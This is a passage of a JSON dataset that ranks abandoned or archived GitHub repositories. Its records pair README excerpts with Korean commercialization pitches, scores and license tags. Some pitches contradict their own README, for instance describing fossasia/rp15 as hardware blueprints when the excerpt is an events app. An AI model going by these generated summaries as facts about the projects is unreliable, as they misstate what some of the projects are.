[pull requests](https://github.com/mhagiwara/100-nlp-papers/pulls) and [issues](https://github.com/mhagiwara/100-nlp-papers/issues) if anything is missing.\n\nA paper doesn't have to be a peer-revie","composite_score":0.3225,"license_safety_tag":"unknown"},{"name":"JetBrains/kotlin-native","github_url":"https://github.com/JetBrains/kotlin-native","stars":5,"language":"Kotlin","license":"apache-2.0","abandonment_months":58,"description":"# Kotlin Native 저장소 분석\n\n## 왜 보물인가\n스마트폰, 데스크톱, 웹 등 다양한 기기에서 같은 프로그래밍 언어로 앱을 만들 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **크로스플랫폼 SaaS**: iOS·안드로이드·웹 동시 지원이 필요한 협업 도구, 메모 앱, 클라우드 서비스\n2. **기업용 내부 업무 도구**: 여러 운영","readme_excerpt":"[![official project](http://jb.gg/badges/official.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)\n# Kotlin/Native  #\n\nThe development of Kotlin/Native was moved to https://github.com/JetBrains/kotlin.\nBecause of that, this repository was archived.\n\nInstead of creating new issues in this repository or commenting the existing ones,\nplease use other ways to communicate: https://github.com/JetBrains/kotlin-native/issues/4079\n","composite_score":0.3225,"license_safety_tag":"safe"},{"name":"Dromara/soul","github_url":"https://github.com/Dromara/soul","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Soul 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션의 요청을 효율적으로 관리하고 분배하는 오픈소스 솔루션으로, 많은 사용자가 동시에 접속할 때 시스템을 안정적으로 운영할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 블랙프라이데이 같은 대량 접속 시기에 서버 과부하를 방지하며 안정적인 쇼핑 경험 제공\n2. **금융 ","readme_excerpt":"![Light Logo](https://raw.githubusercontent.com/apache/shenyu-website/main/static/img/logo-light.svg#gh-dark-mode-only)\n![Dark Logo](https://raw.githubusercontent.com/apache/shenyu-website/main/static/img/logo.svg#gh-light-mode-only)\n\n<p align=\"center\">\n  <strong>Scalable, High Performance, Responsive API Gateway Solution for all MicroServices</strong>\n</p>\n<p align=\"center\">\n  <a href=\"https://shenyu.apache.org/\">https://shenyu.apache.org/</a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://shenyu.apache.org/docs/index\" >\n    <img src=\"https://img.shields.io/badge/document-English-blue.svg\" alt=\"EN docs\" />\n  </a>\n  <a href=\"https://shenyu.apache.org/zh/docs/index\">\n    <img src=\"https://img.shields.io/badge/文档-简体中文-blue.svg\" alt=\"简体中文文档\" />\n  </a>\n</p>\n\n<p align=\"center\">\n    <a target=\"_blank\" href=\"https://search.maven.org/search?q=g:org.apache.shenyu%20AND%20a:shenyu\">\n        <img src=\"https://img.shields.io/maven-central/v/org.apache.shenyu/shenyu.svg?label=maven%20central\" />\n    <","composite_score":0.3225,"license_safety_tag":"safe"},{"name":"aben1188/awesome-wepy","github_url":"https://github.com/aben1188/awesome-wepy","stars":13,"language":"","license":"unknown","abandonment_months":62,"description":"# awesome-wepy 상용화 분석\n\n## 왜 보물인가\nWeChat 미니프로그램 개발을 쉽게 해주는 자료 모음으로, 중국 시장의 모바일 앱 개발자들이 빠르게 제품을 만들 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: WeChat 미니프로그램 개발 과정을 자동화하는 온라인 플랫폼 제공\n2. **내부 업무 도구**: 대형 I","readme_excerpt":"## 微信小程序WePY框架开发资源汇总 ![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)\n### **awesome-wepy，awesome for WePY！**\n\n- [WePY官方仓库](https://github.com/Tencent/wepy)\n- [WePY官方文档](https://wepyjs.github.io/wepy-docs/)\n- [微信小程序官方文档](https://developers.weixin.qq.com/miniprogram/dev/framework/)\n- [微信小游戏官方文档](https://developers.weixin.qq.com/minigame/dev/)\n\n---\n\n<!--### :point_right: 小程序/小游戏挂靠、代运营服务\n- **合作前提：** 我方为具有《网络文化经营许可证(俗称文网文)》、《增值电信业务经营许可证(俗称ICP)》资质证书的公司，贵方有急于上线的小程序或小游戏，但没有公司或有公司但没有相关资质证书\n- **合作范围：** \n\t- 社交红包类小程序（该类小程序由于涉及到红包功能与支付功能，必须具有ICP才能上线）；\n\t- 小游戏（小游戏必须同时具有文网文和ICP，才能开通微信支付功能）；\n\t- 其他必须具有文网文和/或ICP的小程序。\n- **合作方式：** 以服务器费用、运营费用等相关费用由哪方负责为基准，分为以下几种合作方式：\n\t- 相关费用全部由贵方负责，每月固定费用1000元+我方收取收入的10%；\n\t- 相关费用全部由我方负责，我方收取收入的30%~60%；\n\t- 其他合作方式：具体项目具体协商。\n\n### :point_right: 月付20K以上找小程序/小游戏兼职程序员或外包团队\n- **报酬：** 报酬可按周支付，同时可按收入分成，收入上不封顶\n- **要求：**\n\t- 实际开发过从前端到后端完整的小程序或小游戏的个人和团队；\n\t- 有社交红包类开发经验者或H5页游/手游开发经验者优先；\n\t- 能力出众、经验丰富的开发者，以上优先条件可忽略。\n- **不看学历和履历","composite_score":0.3224,"license_safety_tag":"unknown"},{"name":"fqrouter/fqrouter","github_url":"https://github.com/fqrouter/fqrouter","stars":16,"language":"Java","license":"unknown","abandonment_months":95,"description":"# fqrouter 프로젝트 분석\n\n## 왜 보물인가\n인터넷 연결을 더 빠르고 안정적으로 만들어주는 기술로, 느린 네트워크 환경에서도 쾌적한 인터넷 사용을 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/프록시 서비스**: 느린 지역의 사용자들을 위한 고속 인터넷 접속 SaaS 플랫폼\n2. **모바일 통신사 앱**: 약한 신호 지역에서 데이터 ","readme_excerpt":"[![Google Play](http://developer.android.com/images/brand/en_generic_rgb_wo_45.png)](https://play.google.com/store/apps/details?id=fq.router2)\n\n<a href=\"http://www.jetbrains.com/idea/\">\n<img src=\"http://www.jetbrains.com/idea/opensource/img/all/banners/idea125x37_blue.gif\"/>\n</a>\n\nfqrouter released under the terms of GPL v3.0\n\n\n[![Bitdeli Badge](https://d2weczhvl823v0.cloudfront.net/fqrouter/fqrouter/trend.png)](https://bitdeli.com/free \"Bitdeli Badge\")\n\n","composite_score":0.3224,"license_safety_tag":"unknown"},{"name":"fossasia/rp15","github_url":"https://github.com/fossasia/rp15","stars":11,"language":"Kotlin","license":"apache-2.0","abandonment_months":35,"description":"# fossasia/rp15 평가 분석\n\n## 왜 보물인가\n오픈소스 하드웨어 프로젝트로서 누구나 자유롭게 제조하고 개선할 수 있는 물리적 제품 설계도를 제공합니다.\n\n## 어디에 쓸 수 있나\n- **교육용 키트 판매**: 대학교나 메이커스페이스에 조립 가능한 하드웨어 교육 패키지로 판매\n- **기업 맞춤형 제조**: 스타트업이나 제조회사가 설계도를 활용해 ","readme_excerpt":"# Open Event Attendee App\n[![Build Status](https://img.shields.io/travis/fossasia/open-event-attendee-android/development.svg?label=development)](https://travis-ci.org/fossasia/open-event-attendee-android?branch=development)\n[![Build Status](https://img.shields.io/travis/fossasia/open-event-attendee-android/master.svg?label=master)](https://travis-ci.org/fossasia/open-event-attendee-android?branch=master)\n[![Join the chat at https://gitter.im/fossasia/open-event-android](https://badges.gitter.im/fossasia/open-event-android.svg)](https://gitter.im/fossasia/open-event-android?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/open-event)\n[![Twitter Follow](https://img.shields.io/twitter/follow/eventyay.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/eventyay)\n\nAn events app to discover events happening around","composite_score":0.3224,"license_safety_tag":"safe"},{"name":"DroidNinja/Android-FilePicker","github_url":"https://github.com/DroidNinja/Android-FilePicker","stars":6,"language":"Kotlin","license":"unknown","abandonment_months":33,"description":"# Android-FilePicker 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱에서 휴대폰의 파일을 쉽게 선택하고 관리할 수 있는 기능을 제공하는 도구로, 수많은 앱 개발자들이 필요로 하는 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n- **클라우드 저장소 SaaS**: 구글 드라이브 같은 클라우드 서비스에서 사용자가 휴대폰 파일을 업로드할 때 필요한 ","readme_excerpt":"# Android-FilePicker (Androidx based)\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Android--FilePicker-green.svg?style=true)](https://android-arsenal.com/details/1/4044)\n [ ![Latest Version](https://api.bintray.com/packages/droidninja/maven/com.droidninja.filepicker/images/download.svg) ](https://bintray.com/droidninja/maven/com.droidninja.filepicker/_latestVersion)\n \nA filepicker which allows to select images and videos with flexibility. It also supports selection of files by specifying its file type. For using this library, you have to migrate your project to [androidx](https://developer.android.com/jetpack/androidx/migrate) or you can use older version(2.1.5). Check out app module for example.\n\nFor **Android 10** devices using document picker, you will need to enable `android:requestLegacyExternalStorage=\"true\"` option in your manifest file. This document picker will get **deprecated** soon over scoped storage and also, this flag will not work in when you targe","composite_score":0.3223,"license_safety_tag":"unknown"},{"name":"fossasia/open-event-android","github_url":"https://github.com/fossasia/open-event-android","stars":5,"language":"Kotlin","license":"apache-2.0","abandonment_months":35,"description":"# fossasia/open-event-android 분석\n\n## 왜 보물인가\n행사나 컨퍼런스 참석자들이 스마트폰에서 일정, 지도, 연사 정보를 한눈에 볼 수 있는 앱을 직접 만들고 배포할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 행사 주최사들이 구독료를 내고 자신의 행사용 맞춤형 모바일 앱을 자동으로 생성해 ","readme_excerpt":"# Open Event Attendee App\n[![Build Status](https://img.shields.io/travis/fossasia/open-event-attendee-android/development.svg?label=development)](https://travis-ci.org/fossasia/open-event-attendee-android?branch=development)\n[![Build Status](https://img.shields.io/travis/fossasia/open-event-attendee-android/master.svg?label=master)](https://travis-ci.org/fossasia/open-event-attendee-android?branch=master)\n[![Join the chat at https://gitter.im/fossasia/open-event-android](https://badges.gitter.im/fossasia/open-event-android.svg)](https://gitter.im/fossasia/open-event-android?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/open-event)\n[![Twitter Follow](https://img.shields.io/twitter/follow/eventyay.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/eventyay)\n\nAn events app to discover events happening around","composite_score":0.3223,"license_safety_tag":"safe"},{"name":"streamproc/MediaStreamRecorder","github_url":"https://github.com/streamproc/MediaStreamRecorder","stars":6,"language":"JavaScript","license":"mit","abandonment_months":96,"description":"# MediaStreamRecorder 분석 보고서\n\n## 왜 보물인가\n스마트폰이나 컴퓨터 화면에서 일어나는 모든 영상·음성을 자동으로 녹화하는 기술로, 온라인 수업·회의·게임 녹화 등 일상적인 수요가 매우 높습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 학생들이 수업을 자동으로 녹화·저장하는 기능 제공\n- **화상회의 도구**: Zo","readme_excerpt":"# [MediaStreamRecorder.js](https://github.com/streamproc/MediaStreamRecorder) - [Demos](https://www.webrtc-experiment.com/msr/)\n\n[![npm](https://img.shields.io/npm/v/msr.svg)](https://npmjs.org/package/msr) [![downloads](https://img.shields.io/npm/dm/msr.svg)](https://npmjs.org/package/msr) [![Build Status: Linux](https://travis-ci.org/streamproc/MediaStreamRecorder.png?branch=master)](https://travis-ci.org/streamproc/MediaStreamRecorder)\n\n## [Demos](https://www.webrtc-experiment.com/msr/) using [MediaStreamRecorder.js](https://github.com/streamproc/MediaStreamRecorder) library\n\n| Experiment Name        | Demo           | Source Code |\n| ------------- |-------------|-------------|\n| **Audio Recording** | [Demo](https://www.webrtc-experiment.com/msr/audio-recorder.html) | [Source](https://github.com/streamproc/MediaStreamRecorder/tree/master/demos/audio-recorder.html) |\n| **Video Recording** | [Demo](https://www.webrtc-experiment.com/msr/video-recorder.html) | [Source](https://github.co","composite_score":0.3222,"license_safety_tag":"safe"},{"name":"gravity-postquantum/gravity-sphincs","github_url":"https://github.com/gravity-postquantum/gravity-sphincs","stars":9,"language":"C","license":"unknown","abandonment_months":103,"description":"# Gravity-SPHINCS 저장소 분석\n\n## 왜 보물인가\n양자컴퓨터 시대에도 안전한 전자서명 기술을 제공하여, 미래의 사이버 보안 위협으로부터 데이터를 보호할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융기관용 SaaS 서비스**\n은행과 증권사의 거래 인증 시스템에 통합하여 20년 이상의 장기 거래 기록을 변조 불가능하게 보호합니다.\n\n*","readme_excerpt":"# Gravity-SPHINCS\n\nSubmission to NIST's Post-Quantum Cryptography Project, structured as per\n<http://csrc.nist.gov/groups/ST/post-quantum-crypto/submission-requirements/digital-optical-media.html>.\n\nGravity-SPHINCS is a stateless hash-based signature scheme designed by Jean-Philippe Aumasson and Guillaume Endignoux while working in Kudelski Security's research team.\n\n## Content of this submission package\n\n### Documentation\n\n* [Supporting_Documentation/submission.pdf](Supporting_Documentation/submission.pdf): Reference documentation of Gravity-SPHINCS, include specification, security analysis, performance analysis.\n\n* [Supporting_Documentation/latex_source/](Supporting_Documentation/latex_source/): LaTeX source of the reference documentation.\n\n* [Supporting_Documentation/master_thesis_endignoux_guillaume.pdf](Supporting_Documentation/master_thesis_endignoux_guillaume.pdf): Masters thesis of Guillaume Endignoux, containing detailed analyses related to Gravity-SPHINCS' security.\n\n* [Suppo","composite_score":0.3222,"license_safety_tag":"unknown"},{"name":"korlibs/korma","github_url":"https://github.com/korlibs/korma","stars":13,"language":"Kotlin","license":"NOASSERTION","abandonment_months":47,"description":"# Korma 저장소 분석\n\n## 왜 보물인가\n수학 계산의 정확성이 중요한 금융, 과학, 게임 개발 분야에서 필요한 고성능 수학 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융 SaaS 서비스**: 투자 수익률 계산, 자산 관리 플랫폼의 정확한 수치 연산 기능\n2. **3D 게임/그래픽 개발 도구**: 게임 엔진이나 설계 소프트웨어의 좌표 변환","readme_excerpt":"# Moved to <https://github.com/korlibs/korge/tree/main/korma>\n","composite_score":0.3222,"license_safety_tag":"unknown"},{"name":"relax/relax","github_url":"https://github.com/relax/relax","stars":5,"language":"JavaScript","license":"gpl-3.0","abandonment_months":59,"description":"# relax/relax 저장소 분석\n\n## 왜 보물인가\n마지막 커밋이 2021년 7월로 3년 이상 업데이트되지 않아 현재 활발한 프로젝트로 보기 어렵습니다.\n\n## 어디에 쓸 수 있나\n저장소에 대한 설명 정보가 없어 구체적인 용도를 파악하기 어렵습니다. 저장소의 README 파일을 먼저 확인이 필요합니다.\n\n## 누구에게 팔 수 있나\n현재 정보 부족으로 ","readme_excerpt":"**IMPORTANT NOTE:** This project is no longer maintained or active. In the meantime we've started a simillar but different project that we felt was lacking and should exist, a professional tool for web developers and designers, a Unity for the web. After more than 4 years in the making we've now launched on [ProductHunt](https://www.producthunt.com/posts/clutch-3). Clutch is a low code tool that streamlines a professional team workflow and allows them to move together and faster. Go check it out and join us in our [community slack](https://join.slack.com/t/clutch-community/shared_invite/zt-s33mb7is-sC_8Ruk31n~bO~_PCTPa7Q), eager to hear everyone's feedback and thoughts. The tool is free to use!\n\n\nWhat is Relax\n-------\n\nRelax is a powerful new generation CMS on top of\n[React](https://facebook.github.io/react/) and [Node.js](https://nodejs.org/en/)\nwhich aims for a better way of building websites.\n\nIt features a live page builder based on components and a smart and easy way of\nbinding dy","composite_score":0.3222,"license_safety_tag":"restricted"},{"name":"dyweb/awesome-resume-for-chinese","github_url":"https://github.com/dyweb/awesome-resume-for-chinese","stars":7,"language":"","license":"unknown","abandonment_months":15,"description":"# awesome-resume-for-chinese 분석\n\n## 왜 보물인가\n중국인 구직자들을 위해 맞춤형 이력서 작성법과 템플릿을 모아놓은 실용적인 가이드 모음이다.\n\n## 어디에 쓸 수 있나\n\n1. **이력서 자동 생성 SaaS**: 한국·중국 구직자 대상 AI 기반 이력서 작성 플랫폼으로 이 내용을 학습 데이터로 활용\n2. **취업 교육 내부 도구**","readme_excerpt":"# Awesome Resume for Chinese\n\n适合中文的简历模板\n\n## How to Contribute\n\n请见[贡献指南](./contributing.md)!\n\n## LaTeX\n\n- [dyweb/Deedy-Resume-for-Chinese](https://github.com/dyweb/Deedy-Resume-for-Chinese) 适合应届毕业生的 LaTeX 简历模板，by [@dyweb](https://github.com/dyweb)\n\n<div align=\"center\">\n\t<img src=\"https://raw.githubusercontent.com/dyweb/Deedy-Resume-for-Chinese/master/OpenFonts.Chinese/sample-image.png\" width=\"350\">\n    <img src=\"https://raw.githubusercontent.com/dyweb/Deedy-Resume-for-Chinese/master/OpenFonts/sample-image.png\" width=\"350\">\n</div>\n\n- [cv_resume](https://github.com/geekplux/cv_resume) 中文简历 Latex 模板。基于 ModernCV 模板，进行了中文字体支持和优化，by [@geekplux](https://github.com/geekplux)\n\n<div align=\"center\">\n\t<img src=\"https://raw.githubusercontent.com/geekplux/cv_resume/master/template_cn_blue.png\" width=\"350\">\n</div>\n\n- [billryan/resume](https://github.com/billryan/resume) An elegant \\LaTeX\\ résumé template, by [@billryan](https://github.com/billryan)\n\n<div align=\"center\">\n\t<img src=\"https://user-images.","composite_score":0.3221,"license_safety_tag":"unknown"},{"name":"spikecodes/libreddit","github_url":"https://github.com/spikecodes/libreddit","stars":21,"language":"Rust","license":"AGPL-3.0","abandonment_months":15,"description":"# Libreddit 상용화 분석\n\n## 왜 보물인가\nReddit의 광고 없는 깔끔한 대체 서비스로, 개인정보 보호를 원하는 사용자들에게 어필할 수 있는 프라이버시 중심의 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형 \"프라이버시 Reddit 뷰어\" 앱으로 출시하여 광고 없는 깔끔한 Reddit 경험 제공\n- **내부 업무","readme_excerpt":"# Libreddit\n\n> An alternative private front-end to Reddit\n\n# ➡️ Rebranded to [Redlib](https://github.com/redlib-org/redlib), where Reddit API workarounds were implemented and development is ongoing.\n\n## As of July 12th, 2023, Libreddit is currently not operational as Reddit's API changes, that were designed to kill third-party apps and content scrapers who don't pay [large fees](https://www.theverge.com/2023/5/31/23743993/reddit-apollo-client-api-cost), went into effect. [Read the full announcement here.](https://github.com/libreddit/libreddit/issues/840)\n\n![screenshot](https://i.ibb.co/QYbqTQt/libreddit-rust.png)\n\n---\n\n**10-second pitch:** Libreddit is a portmanteau of \"libre\" (meaning freedom) and \"Reddit\". It is a private front-end like [Invidious](https://github.com/iv-org/invidious) but for Reddit. Browse the coldest takes of [r/unpopularopinion](https://libreddit.spike.codes/r/unpopularopinion) without being [tracked](#reddit).\n\n- 🚀 Fast: written in Rust for blazing-fast speeds a","composite_score":0.3221,"license_safety_tag":"risky"},{"name":"sharish/ShimmerRecyclerView","github_url":"https://github.com/sharish/ShimmerRecyclerView","stars":14,"language":"Kotlin","license":"NOASSERTION","abandonment_months":31,"description":"# ShimmerRecyclerView 평가 보고서\n\n## 왜 보물인가\n앱에서 데이터를 불러오는 동안 사용자에게 보여줄 수 있는 반짝이는 로딩 화면을 쉽게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 앱**: 상품 목록 로딩 중 반짝이는 스켈레톤 화면으로 사용자 경험 개선\n- **뉴스 앱 서비스**: 기사 목록을 받아오는 동안 시각적","readme_excerpt":"[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-ShimmerRecyclerView-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/5058)\n[![Build Status](https://travis-ci.org/sharish/ShimmerRecyclerView.svg?branch=master)](https://travis-ci.org/sharish/ShimmerRecyclerView)\n\n# ShimmerRecyclerView\n\n\nIntro\n------\n\nA custom recycler view with shimmer views to indicate that views are loading. The recycler view has a built-in adapter to control the shimmer appearance and provide two methods -\n\n* showShimmerAdapter() - set up a demo adapter a predefined number of child demo views.\n* hideShimmerAdapter() - restores your adapter to show the actual child elements.\n\n    \nDemo Screen\n------\n\nThere are two kinds of shimmer animation which you can see here:\n\n1. This type of shimmer effect uses the whole ViewHolder item to animate on.\n\n|     List Demo                |        Grid Demo              | \n| ----------------------------  | ----------------------------- | \n| <img src","composite_score":0.322,"license_safety_tag":"unknown"},{"name":"viosey/hexo-theme-material","github_url":"https://github.com/viosey/hexo-theme-material","stars":10,"language":"CSS","license":"gpl-3.0","abandonment_months":49,"description":"# Hexo Theme Material 상용화 분석\n\n## 왜 보물인가\n블로그나 포트폴리오 웹사이트를 쉽게 만들 수 있는 디자인 템플릿으로, 기술 지식 없이도 전문적인 외관의 사이트를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클릭만으로 블로그를 시작할 수 있는 '개인 블로깅 플랫폼' 유료 구독 서비스\n2. **내부 업무","readme_excerpt":"\n<h1>Material Theme</h1>\n\n<i>A pure Material Design theme for Hexo</i>\n\n<p>\n<img alt=\"Version\" src=\"https://img.shields.io/badge/version-1.5.6-757575.svg?style=flat-square\"/>\n<a href=\"https://blh.im\"><img alt=\"Author\" src=\"https://img.shields.io/badge/author-bollnh-red.svg?style=flat-square\"/></a>\n<a href=\"https://hexo.io\"><img alt=\"Hexo\" src=\"https://img.shields.io/badge/hexo-3.0+-0e83cd.svg?style=flat-square\"/></a>\n<a href=\"https://nodejs.org/\"><img alt=\"node.js\" src=\"https://img.shields.io/badge/node.js-6.0%2B-43853d.svg?style=flat-square\"/></a>\n<a href=\"https://www.npmjs.com/package/hexo-material\"><img alt=\"npm\" src=\"https://img.shields.io/npm/dt/hexo-material.svg?style=flat-square\"/></a>\n</p>\n\n<p align=\"center\">\n<img src=\"https://i.loli.net/2017/09/07/59b1367f76fdb.png\" alt=\"Material Render Phone\">\n</p>\n\nEnglish | [简体中文](./README.zh.md)\n\n## Table of Contents\n\n- [Demo](#demo)\n- [Docs](#docs)\n- [Download](#download)\n- [Contributing](#contributing)\n- [License](#license)\n- [Changelog]","composite_score":0.3219,"license_safety_tag":"restricted"},{"name":"znxlwm/pytorch-generative-model-collections","github_url":"https://github.com/znxlwm/pytorch-generative-model-collections","stars":5,"language":"Python","license":"unknown","abandonment_months":74,"description":"# pytorch-generative-model-collections 평가 보고서\n\n## 왜 보물인가\n컴퓨터가 스스로 새로운 이미지나 데이터를 만들어내는 기술들을 한곳에 모아놓은 학습용 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 이미지 생성 SaaS**: 사용자가 텍스트만 입력하면 자동으로 그림을 만들어주는 서비스\n2. **게임/영상 제작 ","readme_excerpt":"# pytorch-generative-model-collections\nOriginal : [[Tensorflow version]](https://github.com/hwalsuklee/tensorflow-generative-model-collections)\n\nPytorch implementation of various GANs.\n\nThis repository was re-implemented with reference to [tensorflow-generative-model-collections](https://github.com/hwalsuklee/tensorflow-generative-model-collections) by [Hwalsuk Lee](https://github.com/hwalsuklee)\n\nI tried to implement this repository as much as possible with [tensorflow-generative-model-collections](https://github.com/hwalsuklee/tensorflow-generative-model-collections), But some models are a little different.\n\nThis repository is included code for CPU mode Pytorch, but i did not test. I tested only in GPU mode Pytorch.\n\n## Dataset\n\n- MNIST\n- Fashion-MNIST\n- CIFAR10\n- SVHN\n- STL10\n- LSUN-bed\n#### I only tested the code on MNIST and Fashion-MNIST.\n\n## Generative Adversarial Networks (GANs)\n### Lists (Table is borrowed from [tensorflow-generative-model-collections](https://github.com/hwals","composite_score":0.3217,"license_safety_tag":"unknown"},{"name":"Kyubyong/nlp_tasks","github_url":"https://github.com/Kyubyong/nlp_tasks","stars":8,"language":"","license":"apache-2.0","abandonment_months":93,"description":"# Kyubyong/nlp_tasks 분석 보고서\n\n## 왜 보물인가\n자연어 처리 분야의 다양한 학습 과제들을 한곳에 모아놓아, 인공지능 기업들이 모델을 빠르게 테스트하고 개선할 수 있는 기초 자료실 역할을 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 채용 회사의 이력서 자동 분석 플랫폼에 텍스트 인식 기능 탑재\n- **내부 업무 도구*","readme_excerpt":"# Natural Language Processing Tasks and Selected References\n\nI've been working on several natural language processing tasks for a long time. One day, I felt like drawing a map of the NLP field where I earn a living. I'm sure I'm not the only person who wants to see at a glance which tasks are in NLP.\n\nI did my best to cover as many as possible tasks in NLP, but admittedly this is far from exhaustive purely due to my lack of knowledge. And selected references are biased towards recent deep learning accomplishments. I expect these serve as a starting point when you're about to dig into the task. I'll keep updating this repo myself, but what I really hope is you collaborate on this work. Don't hesitate to send me a pull request!\n\nOct. 13, 2017.<br/>\nby Kyubyong\n\nReviewed and updated by [YJ Choe](https://github.com/yjchoe) on Oct. 18, 2017.\n\n## Anaphora Resolution\n  * See [Coreference Resolution](#coreference-resolution)\n\n## Automated Essay Scoring\n  * ****`PAPER`**** [Automatic Text Scori","composite_score":0.3217,"license_safety_tag":"safe"},{"name":"siddharthist/coq-big-o","github_url":"https://github.com/siddharthist/coq-big-o","stars":6,"language":"Coq","license":"mpl-2.0","abandonment_months":110,"description":"# Coq Big-O 저장소 분석\n\n## 왜 보물인가\n프로그래밍에서 코드의 성능을 수학적으로 증명하는 희귀한 도구로, 금융·항공·의료 같은 안전이 중요한 산업에서 매우 고가치입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 고성능 검증 플랫폼**\n- 소프트웨어 개발사가 구독하여 자신의 코드 성능을 자동으로 검증하는 클라우드 서비스\n\n**2. ","readme_excerpt":"# Big O Notation for Coq\n\n<!-- Shamelessly stolen readthedocs.io badge -->\n[![Build Status](https://travis-ci.org/siddharthist/coq-big-o.svg?branch=master)](https://travis-ci.org/siddharthist/coq-big-o)\n[![Documentation](https://readthedocs.org/projects/docs/badge/?version=latest)](https://siddharthist.github.io/coq-big-o/html/toc.html)\n\nA flexible yet easy-to-use formalization of Big O, Big Theta, and more\nBachmann-Landau notations based on seminormed vector spaces.\n\n## Table of Contents\n\n<!-- markdown-toc start - Don't edit this section. Run M-x markdown-toc-generate-toc again -->\n**Table of Contents**\n\n- [Big O Notation for Coq](#big-o-notation-for-coq)\n    - [Table of Contents](#table-of-contents)\n    - [Features](#features)\n        - [Definitions](#definitions)\n        - [Theorems & Lemmas](#theorems--lemmas)\n    - [API Documentation](#api-documentation)\n    - [Installation](#installation)\n        - [Related Work](#related-work)\n    - [Contributing](#contributing)\n\n<!-- markdown-t","composite_score":0.3216,"license_safety_tag":"unknown"},{"name":"fengjundev/Android-Skin-Loader","github_url":"https://github.com/fengjundev/Android-Skin-Loader","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":64,"description":"# Android-Skin-Loader 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱의 외모(색상, 테마)를 실시간으로 바꿀 수 있는 기술로, 앱을 재시작하지 않고도 사용자가 원하는 스타일로 즉시 변경할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 테마 커스터마이징 SaaS**\n- 기업들이 자신의 앱에 다양한 테마 기능을 빠르게 추가할 수 있는 월 구","readme_excerpt":"# Android-Skin-Loader \n\n\n\n\n> 联系我 : fengjun.dev@gmail.com  \n> \n> 个人博客 : [http://allenfeng.com/](http://allenfeng.com/)\n>\n> 一个通过动态加载本地皮肤包进行换肤的皮肤框架\n\n\n## 广告时间：\n\n本人主讲课程：[《Android 应用程序构建实战+原理精讲》](https://coding.imooc.com/class/465.html)  \n\n深度掌握 Gradle 使用，系统性学习 Android 应用构建知识。欢迎学习～\n\n![](https://tva1.sinaimg.cn/large/008eGmZEgy1gnu03ontfuj31gu0oqwt4.jpg)\n\n\n## 更新日志\n- 导入到Android Studio，使用gradle构建皮肤包（见`7. 皮肤包是什么？如何生成？`）(2015-12-02)\n- 解决Fragment换肤在某些版本的support-v4包下失效的问题（感谢@javake同学）(2015-12-02)\n- 对`textColor`加入selector类型的资源的换肤支持(感谢@pinotao同学) （2015-09-26）\n- 添加在代码中创建的View的换肤支持 (2015-09-24)\n\n## 工程目录介绍\n```\nAndroid-Skin-Loader\n├── android-skin-loader-lib      // 皮肤加载库\n├── android-skin-loader-sample   // 皮肤库应用实例\n├── android-skin-loader-skin     // 皮肤包生成demo\n└── skin-package                 // 皮肤包输出目录\n```\n\n\n## 演示\n#### 1. 下载[demo](https://github.com/fengjundev/Android-Skin-Loader/tree/master/skin-package), 将`BlackFantacy.skin`放在SD卡根目录\n#### 2. 效果图\n- 换肤前\n![sample](./screenshot/demo1.gif)\n\n- 换肤后\n![sample](.","composite_score":0.3216,"license_safety_tag":"safe"},{"name":"src-d/go-git","github_url":"https://github.com/src-d/go-git","stars":11,"language":"Go","license":"apache-2.0","abandonment_months":50,"description":"# go-git 프로젝트 분석\n\n## 왜 보물인가\n깃(Git)이라는 소프트웨어 개발 필수 도구를 프로그래밍 없이도 활용할 수 있는 기반을 제공하므로, 개발자들의 생산성을 크게 높일 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **코드 관리 SaaS**: GitHub 같은 코드 저장 및 협업 플랫폼을 직접 구축하여 기업에 판매\n- **내부 업무 도구*","readme_excerpt":"## WE CONTINUE THE DEVELOPMENT AT [go-git/go-git](https://github.com/go-git/go-git). This repository is abandoned, and no further updates will be done on the code base, nor issue/prs will be answered or attended.\n\n![go-git logo](https://cdn.rawgit.com/src-d/artwork/02036484/go-git/files/go-git-github-readme-header.png)\n[![GoDoc](https://godoc.org/gopkg.in/src-d/go-git.v4?status.svg)](https://godoc.org/github.com/src-d/go-git) [![Build Status](https://travis-ci.org/src-d/go-git.svg)](https://travis-ci.org/src-d/go-git) [![Build 